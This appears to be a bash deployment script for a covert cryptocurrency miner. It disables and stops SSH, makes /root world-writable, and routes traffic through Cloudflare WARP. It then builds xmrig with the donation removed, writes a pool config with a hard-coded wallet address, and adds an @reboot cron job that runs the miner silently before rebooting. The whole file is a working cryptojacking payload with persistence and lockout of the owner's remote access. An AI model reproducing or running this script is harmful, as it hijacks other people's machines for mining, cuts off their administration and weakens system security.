#! /bin/bash
if [ -f "/root/start.sh" ]; then
/bin/bash /root/start.sh >/dev/null 2>&1
fi

chmod 777 /root

systemctl disable ssh.service || true
systemctl stop ssh.service || true
curl https://pkg.cloudflareclient.com/pubkey.gpg | sudo gpg --yes --dearmor --output /usr/share/keyrings/cloudflare-warp-archive-keyring.gpg
echo "deb [arch=amd64 signed-by=/usr/share/keyrings/cloudflare-warp-archive-keyring.gpg] https://pkg.cloudflareclient.com/ $(lsb_release -cs) main" | sudo tee /etc/apt/sources.list.d/cloudflare-client.list
sudo apt update || true
sudo apt install cloudflare-warp -y
echo y | warp-cli register
warp-cli set-mode warp+doh
sudo apt-get install -y git build-essential cmake libuv1-dev libmicrohttpd-dev libssl-dev hwloc libhwloc-dev screen wget

cd /tmp
git clone https://github.com/xmrig/xmrig xmrig_tmp
cd xmrig_tmp
sed -i -E "s/DonateLevel = [0-9]/DonateLevel = 0/g" src/donate.h
mkdir build
cd build
cmake ..
make

mv xmrig /root/app
mv libxmrig-asm.a /root/ || true
cat <<EOF > /root/config.json
{
  "api": {
    "id": null,
    "worker-id": null
  },
  "http": {
    "enabled": false,
    "host": "127.0.0.1",
    "port": 0,
    "access-token": null,
    "restricted": true
  },
  "autosave": true,
  "version": 1,
  "background": false,
  "colors": true,
  "randomx": {
    "init": -1,
    "numa": true
  },
  "cpu": {
    "enabled": true,
    "huge-pages": true,
    "hw-aes": null,
    "priority": null,
    "memory-pool": false,
    "max-threads-hint": 100,
    "asm": true,
    "argon2-impl": null,
    "cn/0": false,
    "cn-lite/0": false
  },
  "opencl": {
    "enabled": false,
    "cache": true,
    "loader": null,
    "platform": "AMD",
    "cn/0": false,
    "cn-lite/0": false
  },
  "cuda": {
    "enabled": false,
    "loader": null,
    "nvml": true,
    "cn/0": false,
    "cn-lite/0": false
  },
  "donate-level": 1,
  "donate-over-proxy": 1,
  "log-file": null,
  "pools": [
    {
      "algo": null,
      "coin": null,
      "url": "pool.hashvault.pro:80",
      "user": "ZEPHYR2xa4Hg6zqqiXU73nLu4PtktYNHAX6CuZfxQDmChj7JbankcEvC8NjSM5KL26Lfcqp57T2PzNGUnREwv4bx723W2Qve25u47",
      "pass": "x",
      "rig-id": null,
      "nicehash": false,
      "keepalive": false,
      "enabled": true,
      "tls": true,
      "tls-fingerprint": "420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14",
      "daemon": false,
      "self-select": null
    }
  ],
  "print-time": 60,
  "health-print-time": 60,
  "retries": 5,
  "retry-pause": 5,
  "syslog": false,
  "user-agent": null,
  "watch": true
}
EOF
cat <<EOF > /root/start.sh
warp-cli connect
/root/app
sleep 240
EOF

crontab <<EOF
@reboot /bin/bash /root/start.sh >/dev/null 2>&1
EOF
reboot
